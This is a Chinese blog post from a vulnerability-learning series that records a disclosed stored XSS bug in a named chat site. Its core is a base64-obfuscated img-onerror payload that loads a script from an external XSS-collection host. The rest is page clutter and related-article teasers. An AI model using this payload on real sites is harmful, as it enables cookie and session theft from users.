【漏洞学习】DVP-2018-01681 (聊天室XSS)

最新推荐文章于 2022-04-12 11:30:12 发布

原创最新推荐文章于 2022-04-12 11:30:12 发布 · 241 阅读

0 ·

CC 4.0 BY-SA版权

DVP漏洞案例学习专栏收录该内容

25 篇文章

订阅专栏

本文详细分析了一个存在于dew.one聊天室中的安全漏洞。通过利用该漏洞，攻击者可能执行恶意代码，对用户造成威胁。文章提供了漏洞的具体URL，并展示了如何通过一段精心构造的代码触发此漏洞。

漏洞URL：https://dew.one/chat/room

简要描述：

漏洞证明

漏洞利用代码：

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS95V0c4MGw/JytNYXRoLnJhbmRvbSgp'))>

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

m0_64378913的博客

05-13

2万+

目录1 XSS漏洞简介2 XSS漏洞危害3 XSS漏洞分类3.1 反射型XSS3.2 存储型XSS3.3 DOM型XSS3.3.1 节点树模型3.3.2 DOM型XSS4 漏洞验证4.1 漏洞验证相关概念4.2 漏洞验证相关概念之间的区别4.3 常见POC5 XSS漏洞验证实例5.1 反射型XSS漏洞验证实例5.2 存储型XSS漏洞验证实例5.3 DOM型XSS漏洞验证实例6 总结参考文章 1 XSS漏洞简介定义/原理：跨站脚本（Cross-Site Scripting），本应该缩写为CSS，但是

XSS总结

weixin_51356351的博客

11-19

1703

xss理解 1、简介 xss(cross site script)跨站脚本攻击，为了避免与css混淆，所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击，因为应用使用了js框架，因为应用未做任何防御措施，导致了攻击者使用对应的payload进行攻击，受害者运行了攻击者的payload，将攻击者所需的cookie发送给了攻击者，最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗？答：很大，是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害（1）钓鱼欺骗（2）网

参与评论您还未登录，请先登录后发表或查看评论

聊天框xss.txt

热门推荐

qq_55213436的博客

04-12

2万+

一、前言 XSS：跨站脚本攻击，即CSS。利用网页开发时留下的漏洞（web应用程序对用户的输入过滤不足），巧妙的将恶意的代码注入到网页中，使用户浏览器加载并执行恶意制造的代码，以达到攻击的效果。这恶意的代码通常是JS代码，但实际上也可以是JAVA、VBS、ActiveX、Flash或者是普通的HTML。（浏览器不会判断，只要是符合解析，那么就会执行恶意的代码）。可能存在XSS的地方：微博、留言板、聊天室等收集用户输入的地方都可能遭受XSS攻击的风险。只要你对用户的输入没有严格过滤。 ...

台达PLC_DVP-ES3系列硬件及使用手册_硬件配置+连线设定+主机运作+软件设定等.pdf

12-25

台达PLC_DVP-ES3系列是一款由台达电子科技公司推出的可编程逻辑控制器，其硬件配置丰富，适用于各种工业自动化应用场景。本手册详细介绍了该系列PLC的硬件配置、连线设定、主机运作以及软件设定等内容，旨在帮助用户...

DVP-PLC-特殊功能模块技术手册

03-15

根据给定的文件信息，本手册详细介绍了DVP-PLC特殊功能模块的技术细节，涵盖从模拟输入模块到通讯模块等多方面的应用。以下为知识点的详细解读： 1. 模拟输入模块（DVP04AD/DVP06AD）：模块负责将模拟信号（例如...

台达PLC_DVP-ES3系列编程手册_装置的定义与指令.pdf

12-25

台达PLC_DVP-ES3系列编程手册主要聚焦于该系列PLC的装置定义与指令，这是一款由中达电通公司推出的可编程逻辑控制器，适用于自动化控制系统的编程和配置。DVP-ES3系列PLC具备丰富的功能和较高的性能，能够满足不同...

DVP-EH-数字量模块

03-15

标题“DVP-EH-数字量模块”和描述“介绍了关于DVP-EH-数字量模块的详细说明，提供台达PLC的技术资料的下载”所涉及的知识点...同时，利用网络资源获取最新的技术资料，是深入学习和应用DVP-EH数字量模块的有效手段。

台达可编程控制器（PLC）DVP-EH安装说明.pdf

10-19

台达可编程控制器（PLC）DVP-EH系列是一类高速、多功能的工业自动化控制器，广泛应用于工业生产线和各类自动化设备的控制。本文档提供了DVP-EH系列PLC的安装说明，内容涉及电气规格、功能规格、安装配线、故障排除...

【干货】XSS知识总结

hackzkaq的博客

10-27

6940

XSS基础跨站脚本（英语：Cross-site scripting，通常简称为：XSS）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至

完整的ChatRoom聊天室代码

清欢Viki的博客

04-16

5206

概述上节说到消息粘包和数据不完整的问题未解决，也就是数据传输缓冲区固定，一旦数据长度超出缓冲区大小，便会出现问题。解决方案就是，把每条消息封装成一个包，包包含包头和包体，包头封装要发送数据的长度，包体封装数据。创建两个变量记录当前读到的位置和数据总长度，读取部分到缓冲区，若读到结尾结束，未到结尾继续读；接收类似不包含文件传输功能运行环境 IDEA 目录结构多模块项目...

32个触发事件XSS语句的总结

weixin_33788244的博客

01-26

516

作者为monyer 1、onmouseenter：当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave：当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...

【漏洞学习】DVP-2018-04149（SQL盲注+XSS）

Fly_鹏程万里

11-21

731

声明：该系列所揭示的漏洞目前厂家已经全部修复，此处发布相关的内容只为提供学习用途，请勿做其他恶意破坏。漏洞证明：一、SQL延时盲注：官网地址：https://www.btwintrade.com 服务器令我无力吐槽，根本不敢用脚本跑，一跑就死，就做个简单的危害证明了。！！！审核大大在复现的时候，对数据库名称进行爆破的时候一定要使用单线程，千万千万别使用多线程，服务器会被直接跑...

【漏洞学习】DVP-2018-01423（XSS+任意用户密码重置）

Fly_鹏程万里

11-21

465

声明：该系列所揭示的漏洞目前厂家已经全部修复，此处发布相关的内容只为提供学习用途，请勿做其他恶意破坏。一、存储型跨站攻击 1）进入平台账户=>财务管理=>资金账户=>添加一条资金账户信息（以添加ETH账户为例），填写资金账户信息，点击“提交”时抓包，添加攻击js代码： 2）提交后，查看前端页面被攻击效果：查看浏览器加载内容： 3）XSS平台获取到被害者账...

【漏洞学习】DVP-2018-16101（假充值漏洞）

Fly_鹏程万里

01-16

350

漏洞URL： https://www.mv.cool/ 简要描述：此交易平台充值的时候给了用户一个手动输入检查充值hash 的选项，用户随意在区块上找一个hash可充值成功。造成任意充值。漏洞证明：漏洞利用代码： Test account : xxxxx@xxxxxxx.com Test Password:1xxxxxxxa 我刚注册的一个账户，证明可注册 hash...

【漏洞学习】DVP-2018-08529（绕过加密登陆任意用户）

Fly_鹏程万里

01-16

303

漏洞URL：https://eos.live/ 简要描述：验证码4位数没时间限制 sha256加密截取的4个字符脚本加密截取即可漏洞证明： https://eos.live/ 手机验证码登录4位数这里验证码是加密的 0000是 b336 看了js是sha256加密截取字符串第五位数开始截取4个字符解密0000正好是b336 写个脚本循环0000-9999 ...